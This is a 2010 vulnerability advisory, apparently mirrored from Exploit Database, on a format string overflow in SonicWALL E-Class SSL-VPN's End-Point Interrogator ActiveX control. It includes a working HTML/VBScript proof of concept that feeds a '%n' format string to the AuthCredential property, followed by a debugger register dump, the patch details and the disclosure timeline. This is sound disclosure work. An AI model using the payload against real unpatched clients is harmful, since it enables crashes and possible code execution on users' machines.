SonicWALL E-Class SSL-VPN – ActiveX Control Format String Overflow

• Exploit Database
• 8 阅读

• 作者： Nikolas Sotiriu
  日期： 2010-08-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14687/

• -------------------------- NSOADV-2010-005 ---------------------------
  
   SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
  ______________________________________________________________________
  ______________________________________________________________________
  
   111101111
  11111 00110 00110001111
   111111 01 01 1 11111011111111
  111110 11 01 0 11 1 1111011001
   11111111101 1 11 011011111111101111
   10010 1 10 11 0 10 11 11111111 111 111001
   111111111 0 10 1111 0 11 11 111111111 1 1101 10
  00111 0 0 11 00 0 1110 1 1011111111111 1111111 11100
   10111111 0 01 01 1 111110 11 111111111111111110000011
   0111111110 0110 1110 1 0 11101111111111111011 1110000
   01111 0 10 1110 1 011111 1 111111111111111111111101 01
   01110 0 10 111110 110 0 11101111111111111111101111101
  111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
  111110110 10 0111110 1 0 0 1111111111111111111111111 110
  111 11111 11 111 1 10011 101111111111011111111 0 1100
   111 10110 101011110010 11111111111111111111111 11 0011100
   11 10 001100 0001111111111111111111 10 11 11110
  11110 0010000001 10 11111101010001 11111111
  1110101011 1000000100 1110000001101 0
  0110 111011011 0110 10001101 11110
  1011 1 10 101 00000101 00
   1010 1110011 110110
  1101010110 101 11110
  110000011
  111
  ______________________________________________________________________
  ______________________________________________________________________
  
  Title:SonicWALL E-Class SSL-VPN ActiveX Control
  format string overflow
  Severity: High
  Advisory ID:NSOADV-2010-005
  Found Date: 22.02.2010
  Date Reported:09.06.2010
  Release Date: 19.08.2010
  Author: Nikolas Sotiriu
  Website:http://sotiriu.de
  Twitter:http://twitter.com/nsoresearch
  Mail: nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2009-005.txt
  Vendor: SonicWALL (http://www.sonicwall.com/)
  Affected Products:SonicWALL SRA EX1600
  SonicWALL EX7000
  SonicWALL EX6000
  SonicWALL EX-1600
  SonicWALL EX-1500
  SonicWALL EX-750
  Affected Versions:10.0.4 and all previous versions
  10.5.1 without hotfix
  Remote Exploitable: Yes
  Local Exploitable:No
  Patch Status: Vendor released a patch
  Discovered by:Nikolas Sotiriu
  Disclosure Policy:http://sotiriu.de/policy.html
  Thanks to:Thierry Zoller: For the permission to use his
  Policy
  
  
  
  Background:
  ===========
  
  SonicWALL has added the award-winning Aventail SSL VPNproduct line to
  our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver
  secure remote access to the most resources from the most end point
  locations. Aventail was named in the Visionaries Quadrant in the SSL
  VPN Magic Quadrant Report from Gartner, considered to be the leading
  analyst firm covering the SSL VPN industry.
  
  (Product description from Website)
  
  
  
  Description:
  ============
  
  Remote exploitation of a format string overflow vulnerability in the
  End-Point Interrogator/Installer ActiveX Control could allow an attacker
  to execute arbitrary code within the security context of the targeted
  user.
  
  The affected function is "AuthCredential". The functions
  "ConfigurationString" seems to be also vulnerable, but the format
  string has to be base64 decoded.
  
  Name: End-Point Interrogator/Installer Module
  Vendor: Aventail Corporation
  Type: ActiveX-Control
  Version:10.3.42
  Prog ID:EPILib.EPInterrogator
  GUID: {2A1BE1E7-C550-4D67-A553-7F2D3A39233D}
  File: epi.dll
  Folder: %userprofile%\Application Data\Aventail\epi
  Safe for Script:True
  Safe for Init:True
  
  
  
  Proof of Concept :
  ==================
  
  <html>
   <head>
  <title>SonicWALL E-Class SSL-VPN ActiveX Control DoS PoC</title>
   </head>
  <body>
  <pre>
  <img src="http://sotiriu.de/images/logo_wh_80.png";>
  
  <input type=button name="Submit" VALUE="Rule #5 – Shoot First">
  
  
  </pre>
  
  <object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D'
  id='obj'></object>
  
  <script language='vbscript'>
  
  Sub Submit_OnClick
  eax=String(2, unescape("%u6161"))
  arg="%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"
  'EAX 61616161
  
  buf=eax+arg
  
  obj.AuthCredential = buf
  End Sub
  
  </script>
  </body>
  </html>
  
  
  
  Notes:
  ======
  
  The Exploit overwrites the EAX register with 0x61616161.
  
  EAX 61616161
  ECX 000007F2
  EDX 00000000
  EBX FFFF006E
  ESP 01929AE4
  EBP 01929F54
  ESI 00000020
  EDI 00000002
  EIP 77C1391B msvcrt.77C1391B
  C 0ES 0023 32bit 0(FFFFFFFF)
  P 1CS 001B 32bit 0(FFFFFFFF)
  A 0SS 0023 32bit 0(FFFFFFFF)
  Z 1DS 0023 32bit 0(FFFFFFFF)
  S 0FS 003B 32bit 7FFD8000(FFF)
  T 0GS 0000 NULL
  D 0
  O 0LastErr ERROR_SUCCESS (00000000)
  EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
  ST0 empty +UNORM 1C68 00000000 E162AA10
  ST1 empty 7.5918347351318302720e-1715
  ST2 empty +UNORM 001C 7779065D E19F4F1C
  ST3 empty 3.4653990691284428800e+1178
  ST4 empty 0.0000000000840901890e-4933
  ST5 empty -??? FFFF 00000000 00000000
  ST6 empty 6.4564231821671188480e-4932
  ST7 empty 1.0000000000000000000
   3 2 1 0E S P U O Z D I
  FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT)
  FCW 027FPrec NEAR,53Mask1 1 1 1 1 1
  
  The function where the exception occurs looks like this:
  
  77C1391B 8908 MOV DWORD PTR DS:[EAX],ECX
  
  
  
  Solution:
  =========
  
  Version 10.0.5:
  +--------------
  
  Download the new version on www.mysonicwall.com
  
  Version 10.5.1:
  +--------------
  
  SonicWALL Security Advisory:
  http://www.sonicwall.com/us/support/kb.asp?kbid=8272
  
  
  
  Disclosure Timeline (YYYY/MM/DD):
  =================================
  
  2010.02.22: Vulnerability found
  2010.06.08: Ask on full-disc for a SonicWALL security contact
  2010.06.09: Initial contact by info () sonicwall and germany () sonicwall
  email address
  2010.06.09: Initial Vendor response by phone from a german SonicWALL SE
  2010.06.09: Got an email from SonicWALL as a response to my mail to
  full-disc with the contact email address
  security () sonicwall com
  2010.06.10: Sent the Notification and Disclosure Policy and ask for a
  PGP Key
  [-] No Response
  2010.06.18: Got an email response from the SonicWALL SSL-VPN Product
  Manager with a PGP key.
  2010.06.19: Sent PoC, Advisory, Disclosure policy and planned disclosure
  date (2010.06.24) to Vendor
  2010.06.19: SonicWALL acknowledges the reception of the advisory
  2010.06.22: Vendor verifies the vulnerability
  2010.07.07: Ask for a status update, because the planned release date
  was the 2010.06.24
  2010.07.07: SonicWALL informs me that they will release a new version
  at end of July.
  2010.07.07: Changed release date to 2010.07.29
  2010.07.29: Ask for a status update, because the planned release date
  is the 2010.07.29
  2010.07.29: SonicWALL informs me that the version 10.0.5 is in final QA
  and should be released next week.
  2010.08.13: Send SonicWALL the information, that i will release the
  advisory at Wednesday 2010.08.18.
  2010.08.16: SonicWALL informs me that the version 10.0.5 is already
  downloadable for customers.
  2010.08.16: Ask for an SonicWALL advisory and a list of affected
  products
  2010.08.17: SonicWALL sends me there advisory draft
  2010.08.18: Ask SonicWALL for credits in there advisory
  2010.08.19: Release of this advisory